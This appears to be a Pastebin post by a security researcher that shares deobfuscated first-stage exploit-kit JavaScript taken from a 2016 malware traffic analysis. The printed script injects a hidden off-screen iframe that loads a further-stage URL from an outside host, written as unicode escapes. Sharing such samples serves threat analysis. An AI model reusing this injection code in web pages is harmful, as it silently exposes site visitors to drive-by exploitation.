Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Deofsucated 1st layer Exploit Kit Javascript from Malware Traffic analysis
- http://www.malware-traffic-analysis.net/2016/06/02/index.html
- original javascript posted here http://pastebin.com/KrvFUf5W
- *****
- Below is the resulting output of the last statements in the mentioned javascript
- NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));
- NLxwWpg();
- *****
- function MjE4Mzk3MzYzNw() {
- Sgjb6 = '\u006e' + '\u0061' + '\u0076' + '\u0069' + '\u0067' + '\u0061' + '\u0074' + '\u006f' + '\u0072';
- Sgjb5 = '\u0064' + '\u006f' + '\u0063' + '\u0075' + '\u006d' + '\u0065' + '\u006e' + '\u0074';
- Sgjb7 = window;
- Sgjb8 = document;
- Sgjb9 = Sgjb7[Sgjb5];
- Sgjb = '\u0073' + '\u0072' + '\u0063';
- FIMrs = '\u0069' + '\u0066' + '\u0072' + '\u0061' + '\u006d' + '\u0065';
- RbGEGsI = '\u0063' + '\u0073' + '\u0073' + '\u0054' + '\u0065' + '\u0078' + '\u0074';
- vBiNhRC = '\u0067' + '\u0065' + '\u0074' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074' + '\u0073' + '\u0042' + '\u0079' + '\u0054' + '\u0061' + '\u0067' + '\u004e' + '\u0061' + '\u006d' + '\u0065';
- WvVBTR = '\u0062' + '\u006f' + '\u0064' + '\u0079';
- MAx = '\u0077' + '\u0069' + '\u0064' + '\u0074' + '\u0068';
- gUtk = '\u0068' + '\u0065' + '\u0069' + '\u0067' + '\u0068' + '\u0074';
- BUMx = '\u0061' + '\u0070' + '\u0070' + '\u0065' + '\u006e' + '\u0064' + '\u0043' + '\u0068' + '\u0069' + '\u006c' + '\u0064';
- PzmfZG = '\u0063' + '\u0072' + '\u0065' + '\u0061' + '\u0074' + '\u0065' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074';
- Sgjb0 = '\u0073' + '\u0074' + '\u0079' + '\u006c' + '\u0065';
- Sgjb1 = '\u0031' + '\u0033';
- Sgjb2 = Sgjb1;
- Sgjb3 = '\u0070' + '\u006f' + '\u0073' + '\u0069' + '\u0074' + '\u0069' + '\u006f' + '\u006e' + '\u003a' + '\u0061' + '\u0062' + '\u0073' + '\u006f' + '\u006c' + '\u0075' + '\u0074' + '\u0065' + '\u003b' + '\u006c' + '\u0065' + '\u0066' + '\u0074' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0035' + '\u0038' + '\u0070' + '\u0078' + '\u003b' + '\u0074' + '\u006f' + '\u0070' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0036' + '\u0038' + '\u0070' + '\u0078';
- Sgjb4 = Sgjb9[PzmfZG](FIMrs);
- Sgjb4[MAx] = Sgjb2;
- Sgjb4[gUtk] = Sgjb2;
- Sgjb4[Sgjb0][RbGEGsI] = Sgjb3;
- Sgjb4[Sgjb] = '\u0068' + '\u0074' + '\u0074' + '\u0070' + '\u003a' + '\u002f' + '\u002f' + '\u0073' + '\u0074' + '\u0072' + '\u0061' + '\u0063' + '\u0068' + '\u0075' + '\u0062' + '\u0065' + '\u0064' + '\u0061' + '\u0062' + '\u0062' + '\u006c' + '\u0069' + '\u006e' + '\u0067' + '\u002e' + '\u0074' + '\u0068' + '\u006f' + '\u006d' + '\u0070' + '\u0073' + '\u006f' + '\u006e' + '\u0073' + '\u002d' + '\u006f' + '\u006e' + '\u006c' + '\u0069' + '\u006e' + '\u0065' + '\u002e' + '\u0063' + '\u006f' + '\u002e' + '\u0075' + '\u006b' + '\u002f' + '\u0059' + '\u0078' + '\u0075' + '\u005a' + '\u0059' + '\u0052' + '\u002f' + '\u0072' + '\u0054' + '\u006b' + '\u004e' + '\u006e' + '\u004c' + '\u0055' + '\u002f' + '\u0066' + '\u004f' + '\u0068' + '\u0058' + '\u0058' + '\u006a' + '\u0070' + '\u0065' + '\u0059' + '\u002f' + '\u0030' + '\u0030' + '\u0037' + '\u0035' + '\u0037' + '\u002f' + '\u0073' + '\u0064' + '\u006d' + '\u006d' + '\u0054' + '\u0071' + '\u0062' + '\u0077' + '\u0064' + '\u0078' + '\u002d' + '\u0030' + '\u0039' + '\u0032' + '\u0036' + '\u0032' + '\u0030' + '\u002d' + '\u007a' + '\u006b' + '\u0062' + '\u0067' + '\u0072' + '\u0077' + '\u0068' + '\u0069' + '\u002e' + '\u006a' + '\u0070' + '\u0067';
- Sgjb9[vBiNhRC](WvVBTR)[0][BUMx + ''](Sgjb4)
- }
- function ldNRgDCf() {
- var FIMrs0 = setTimeout;
- var FIMrs1 = document.body;
- return (!FIMrs1 ? FIMrs0(ldNRgDCf, 10) : MjE4Mzk3MzYzNw());
- }
- ldNRgDCf();
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment